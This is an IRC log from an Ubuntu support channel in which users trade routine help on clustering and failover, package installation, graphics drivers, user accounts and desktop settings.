magnetronUsuario305: "man ftp" will give you the details23:16
chromePhoenixSTF: they might work like that in your brain23:16
Usuario305ok thanks :)23:16
PhoenixSTFchrome: then again sorry my bad notion of whats what!23:17
PhoenixSTFchrome: and thanks for the explanation ;)23:17
erUSULxomp: ok; good luck23:17
magnetrongothenburg: eru go eller?23:17
PhoenixSTFchrome: so whats it called the big machines made of machines?23:17
chromePhoenixSTF: there are *compute* clusters, which have specially designed applications that target special APIs that can do things like access memory on another machine, and farm out 'processing' units out to other CPUs on other machines, and they are clusters23:17
xomperUSUL: that should work right? I don't want to be wasting time on a fools errand if I can avoid it heh.23:18
chromePhoenixSTF: but you can't just take virtualbox and stick it on a compute cluster and have it "use" all the memory and CPU across all the machines23:18
erUSULxomp: should work yes23:18
gothenburgmagnetron: nej23:18
gothenburgjag är förbannad23:18
xomperUSUL: cheers for this :)23:18
erUSULxomp: no problem23:18
chromePhoenixSTF: For standard software, what a cluster will give you is fail-over and high availability23:18
Usuario305ni är svenskar :p23:18
PhoenixSTFchrome: but nothing of that processing stuff?23:19
chromePhoenixSTF: N+1 machines in a cluster, with say MySQL running on one machine, will allow you to migrate the MySQL instance to the other machine in a few seconds if the primary machine dies.23:19
ubottuSvensk Ubuntu- och Kubuntusupport hittar du på #ubuntu-se resp. #kubuntu-se23:19
PhoenixSTFchrome: yes i know that type of migration fail safe, is also used to update servers and etc!23:20
chromePhoenixSTF: Generally speaking if the application isn't designed for that specific cluster API then no, it's not going to work in the way you think it will.23:20
tucemiuxerUSUL, this is really weird,  I just installed lucid from an ISO, the wireless nm-app wont show up automatically if I'm on a wireless site my laptop is not configured to use so now I cant fire up nm-applet and search for AP's and attempt to connect to whatever is available without security23:20
PhoenixSTFchrome: so i cant connect like 5 machines and make it all work has one and run multiples VM???23:20
chromePhoenixSTF: You can connect 5 machines and run 5 VMs on it, one per machine, and have one die and have one of the other 4 pick up the VM from the dead machine.23:21
erUSULtucemiux: nm-applet does not work ? what errors do you get ?23:21
chromePhoenixSTF: There is some stuff out there for doing memory mirroring, so that if you lose a machine, the process can be "continued" on another machine transparently, but that stuff is quite expensive.23:22
PhoenixSTFchrome: so it would be like 4 fail safes... not realy what i whanted, and its of the self stuff23:23
chromePhoenixSTF: beowulf allows you to build a logical machine that is the sum of it's servers; but again a process running on beowulf only exists on one physical machine at a time.23:23
PhoenixSTFlike multiples cores on a computer!23:23
PhoenixSTFchrome:like multiples cores on a computer23:24
chromePhoenixSTF: it can only allocate memory on one machine, and can only use cpu on one machine unless the application is written to use the memory sharing APIs23:24
tucemiuxerUSUL, it works the way I just mentioned.  nm-applet did not show up automatically when I turned my laptop on.  I attempted to start the applet and I got the error I told you about previously when I was on my phone.  I had to manually go to "Network Conections" and configure SSID on the AP first then nm-applet appeared in its usual place, is this a bug or a "feature"?23:24
chromePhoenixSTF: no, you're not going to get a VM to spread over multiple machines like that23:24
chromePhoenixSTF: think about what you're asking it to do; you're expecting memory access to go over the network23:24
chromePhoenixSTF: again, there ARE hardware architectures that support that kind of thing but they are very very expensive, as they have high speed interconnects between the nodes.23:25
chromeand again. the applications need to be written to support it23:25
chromeyour idea of what clustering is, is wrong23:25
PhoenixSTFchrome: ok chrome thanks for the insight!23:25
PhoenixSTFchrome: and any tutorial on that fail over n+1?23:26
xomperUSUL: I just did "adduser --system xomp" on my VPS and it says it successfully added the new user with nogroup etc.. but when I "su xomp" it does nothing and I'm left still at the "root" prompt. Did I mess something up here?23:26
PhoenixSTFchrome: not what i expected but still usefull23:26
cn1109Hello, How can I install php4? It seems that the package is missing?23:26
magnetroncn1109: what version of ubuntu are you using?23:27
chromePhoenixSTF: Heartbeat should be your first port of call, and it'll run happily on ubuntu server23:27
PhoenixSTFchrome: ill search for it, and see what i can get out of it!23:28
chromePhoenixSTF: you'll also need a shared filesystem of some description23:28
chromePhoenixSTF: that choice really depends on your budget23:28
undecim1Is it safe to install grub 2 from an i386 live cd (knoppix) for use on an amd64 system?23:28
cn1109magnetron: Ubuntu Server (latest version)23:28
PhoenixSTFchrome: budget old machines nobody whants! lol THnaks again m8 ;)23:29
chromePhoenixSTF: if you have lots of them, pick two and plug in lots of shared scsi disk, export it via NFS and use heartbeat for failover (you can only mount it on one machine at a time)23:30
chromeor if you're feeling fancy, look at iSCSI.23:30
PhoenixSTFchrome: sorry m8 only satas and ide!!!!!!23:30
chromesucks to be you then :P23:31
PhoenixSTFchrome: it seems im out of my league!23:31
cn1109okay. So... I'm still looking for php4-mysql23:31
PhoenixSTFchrome: yah sucks to be me23:31
PhoenixSTFchrome: lol thanks m8 sorry for the questions, and cheers ;)23:31
chromePhoenixSTF: iscsi from a bunch of machines, with drbd to replicate between them and failover for the iscsi target23:32
magnetroncn1109: my guess is that it's too old to be included in new versions of ubuntu, especially the LTS versions23:32
chromePhoenixSTF: the cluster nodes can then mount the iscsi devices directly for particilar filesystems and applications are tied to the filesystem, with the heartbeat setup to fail the filesystem and application to other nodes as required23:32
PhoenixSTFchrome: lol out of my league m8, if i get my hands on one ill let you know!23:32
chromemy contract rate is $75/hour :P23:33
PhoenixSTFthanks again!23:33
tucemiuxanyone knows how to install mp3 nonfree software using apt-get ?23:33
PhoenixSTFgood to know :P23:33
sebsebsebtucemiux: MP3 codecs?23:34
=== XFGolden is now known as XFGoldenBBL
magnetrontucemiux: install the package "ubuntu-restricted-extras" with the Software Center (or use apt-get or aptitude or synaptic if you understand them better)23:34
tucemiuxsebsebseb, i just found out theyre the restricted extras23:34
sebsebsebtucemiux: sudo apt-get install ubuntu-restricted-extras yeah23:35
sebsebsebtucemiux: will give you MP3 and AVI and some other stuff23:35
shomonhi, my opengl setup is not working at all since I upgraded from 8.06 to lucid23:35
tucemiuxmagnetron, ubuntu-restricted-extras it is, im identifying all the packages I have to download manually and putting  a script together so that when I reimage my machine Ill just run the sscript and all my appz are installed23:35
shomoneven glxgears doesn't work. Any idea how to fix it?23:35
sebsebsebshomon: 8.04 to Lucid you mean23:36
sebsebsebshomon: you installed propritary driver in 10.04?23:36
shomonActually I thought the proprietary driver was the problem23:36
magnetrontucemiux: 'dpkg --get-selections' will produce a list of all installed packages23:37
sebsebsebshomon: yes may be, whats the actsaul problem?23:37
sebsebsebshomon: try re installing it23:37
shomonok sebsebseb23:37
tmasAnyone know how I can get past verizon blocking HTTP requests?23:37
magnetrontucemiux: that list can later be passed to apt-get to install all those packages23:37
FireCrotchtmas: maybe if you explain the problem a little better than that23:38
uLinuxdamn alacarte buggy23:38
tucemiuxmagnetron, i have my own specific list of appz that i use, i just have a one liner using apt-get that installs all of those appz, every time I reimage a machine I try to figure out the name of the package that I can include to my little one line script23:38
uLinuxsometimes ubuntu sucks23:39
shomonsebsebseb, what is the package name for the proprietary driver? I had fglrx23:39
shomonbut not sure if that's the one to use23:39
tucemiuxuLinux, yes sometimes it does, thats why we have this channel, if you ever run into problems just login to the channel and ask, all in one line and maybe someone will be able to help you23:40
tmasFireCrotch: I'm really not sure how to. Verizon is blocking incoming HTTP requests.23:40
uLinuxor not23:40
FireCrotchtmas: Are you sure they're not just blocking incoming traffic on port 80?23:40
tucemiuxuLinux, if no one is able to help you right now you can wait and ask later, you can also try the forums23:40
coolkehongood god 1500nicks23:40
uLinuxnow I just want to restore those Wine shortcuts reinstalled didn't put it on the menus23:41
coolkehonwhere can I find StyleBats for conky, it gives me weird symbols23:41
mneptoktmas: most ISPs block port 80 for residential accounts. use another port, or get a business account.23:41
xompanyone?: I just did "adduser --system xomp" on my VPS and it says it successfully added the new user with nogroup etc.. but when I "su xomp" it does nothing and I'm left still at the "root" prompt. Did I mess something up here?23:42
Loshkitmas: lots of ISPs don't want you running servers. Some of them will even terminate your service for doing so. Check with your ISP...23:42
uLinuxso anyone can help me fixing the damn wine shortcuts?23:43
MACscrso i just tried launching a game in my 3 monitor setup and now two of my monitors are cloned. How can i restore my settings without losing all my open apps23:43
jedixhey, I have an issue with the preempt kernel and the nvidia drivers23:43
shomonsorry to ask again, but how do you install opengl on lucid?23:43
jedixit's mythbuntu btw23:43
tucemiuxjedix, what's the issue, go ahead and ask --- all in one line ---23:44
spacebug-I'm running ubuntu 10.04. When I plug in my usb devices (harddrive and mp3-player) they get auto mounted. Where should I look if I want to change the OPTIONS with which they get mounted? (I would like to change from utf8 to iso88591).23:44
* uLinux formats because of shortcuts 23:44
vinicius_is there any way to make pidgin go to tray in ubuntu 10.4?23:45
monrielHi all23:45
cn1109magnetron: You are right. Oh well.. php5-mysql seemed to work. THanks!23:45
hobbitriddlesvinicius_: you can set that in Pidgin's settings.23:45
ubottumonriel: Hi! Welcome to #ubuntu! Feel free to ask questions and help people out. The channel guidelines are at https://wiki.ubuntu.com/IRC/Guidelines . Enjoy your stay!23:45
hobbitriddlesvinicius_: Tools>Preferences>Interface23:46
seahorse_can anyone help me out with a lil screwup23:46
monrielacerimmer: Oh... It's my first time with IRC client23:47
hobbitriddles!anyone | seahorse_23:47
ubottuseahorse_: A large amount of the first questions asked in this channel start with "Does anyone/anybody..."  Why not ask your next question (the real one) and find out?23:47
acerimmer_monriel: so what's the question?23:47
vinicius_hobbitriddles, thanks =D23:47
seahorse_trying to find a vanilla copy of/etc/grub.d/05_debian_theme23:48
xompanyone?: I just did "adduser --system xomp" on my VPS and it says it successfully added the new user with nogroup etc.. but when I "su xomp" it does nothing and I'm left still at the "root" prompt. How can I su to my new user account?23:48
hobbitriddlesvinicius_: you're welcome~23:48
monrielacerimmer: It's private dialog now? Tet-a-tet?23:48
monrielacerimmer: Sorry for my language, My english is bad )23:48
seahorse_i borked mine up trying to install spash yadda yada23:48
jedixI upgraded to the newest nvidia current driver and now the preempt kernel doesn't boot with a working video driver23:48
magnetronmonriel: there's no private conversations here, we just speak in group. go on, ask your question23:48
jedixhrm still not23:49
seahorse_i've heard to stay wtih 173 not go to 177 nVidia driver...23:49
seahorse_that fried my latitude23:49
xompmagnetron: if I created a user with --system can I not log in to that new user with "su user"?23:49
jedixI upgraded to the newest nvidia current driver and now the preempt kernel doesn't boot with a working video driver.. how do I get it working?23:49
jedixthere, a question on one line.23:49
magnetronxomp: only if you are root23:49
xompmagnetron: I am23:50
xompmagnetron: I type "su user" and I just sit at the root prompt heh23:50
seahorse_i've heard to stay wtih 173 not go to 177 nVidia driver...23:50
monrielacerimmer: I saw the red text and therefore decided that the tet-a-tet23:50
tucemiuxjedix, try installing the kernel headers, sudo apt-get install kernel-header , I believe or headers23:50
magnetronxomp: what is the problem? the prompt?23:50
monrielacerimmer: =)23:50
jedixtucemiux: apt-get install linux-headers-preempt23:51
seahorse_@jedix 17723:51
seahorse_i've heard to stay wtih 173 not go to 177 nVidia driver...23:51
magnetronxomp: maybe you should use some other method of checking if it works, than just looking at the prompt23:51
seahorse_that 177 fried my latitude23:51
monrielacerimmer: What iRC client you use?23:51
xompmagnetron: well I created a user like this "adduser --system xomp" and it said it created everything fine, there's even now a /home/xomp. When I try to switch to the "xomp" account with "su xomp" it just returns me to the prompt as root.23:51
seahorse_i  need a vanilla /etc/grub.d/05_debian_theme23:52
magnetronxomp: you said that like 10 times23:52
magnetronxomp: good night.23:52
seahorse_anyone help a mofo out?23:52
xompmagnetron: but if I "su otheruser" the prompt changes to "$otheruser" showing it was successful23:52
acerimmer_monriel: chatzilla add on to firefox.  STATE YOUR UBUNTU PROBLEM HERE, please.23:52
LuisV_how to install "palimpsest  disk utility" on ubuntu jaunty?23:52
seahorse_trying to find a vanilla copy of/etc/grub.d/05_debian_theme23:53
seahorse_trying to find a vanilla copy of /etc/grub.d/05_debian_theme23:53
monrielacerimmer_: Now, I don't have problem ) Thank you for your reply )23:53
seahorse_if tere's a kind soul out there willing to help23:53
xompwhy would someone ask you what your problem is then when you explain it for the 10th time they say "you said that like 10 times".. what is the logic behind that?23:53
bugonline selbsthifle gruppe23:53
* xomp checks to see if he had joined #trollbuntu23:54
foul_owlhow do i setup two web servers to mirror each other? in other words, balance web requests between two machines, and if one goes down, the other takes over23:54
=== XFGoldenBBL is now known as XFGolden
nUboon2AgeLuisV_: its called gnome-disk-utility in Synaptic23:54
icerootfoul_owl: i think #httpd is better for that23:54
xompfoul_owl: that sounds a lot like load balancing/slaving. Best ask in #httpd or #nginx depending on your httpd.23:54
tucemiuxjedix, what kernel are you using?  I'm using 2.6.31-10-rt23:54
foul_owlok, good call23:55
gb0hey, mi volume icon has dissapeared from the tool bar23:55
tucemiuxgb0, my volume icon never appeared when I installed lucid from an ISO, i just went ahead and apt-get-install gnome-alsamixer23:55
tucemiuxgb0, sudo apt-get install gnome-alsamixer, sorry23:56
LuisV_<nUboon2Age> ok thanks let me look at it23:56
seahorse_is it poss to pull a clean /etc/grub.d/05_debian_theme of install cd?23:56
monrielacerimmer_: Thank you for everything again. I'm going to install new client )23:56
seahorse_but where to look....23:56
davidmatthewgot a mic problem, builtin mic works with gnome sound, but when i plug my mic in it does not work, also when i try to use skype either mic doesn't work23:57
Guest54152davidmatthew, use the built in mic23:58
seahorse_can't find it on the isntall disc23:59
davidmatthewGuest15140, yeah, it sucks.. but just realized my mic was muted, now both mics work in gnome sound recorder, just nothing works in skype23:59
tucemiuxdavidmatthew, your mic works just fine, just not with skype most likely23:59
seahorse_i REALLY need a vanilla /etc/grub.d/05_debian_theme23:59

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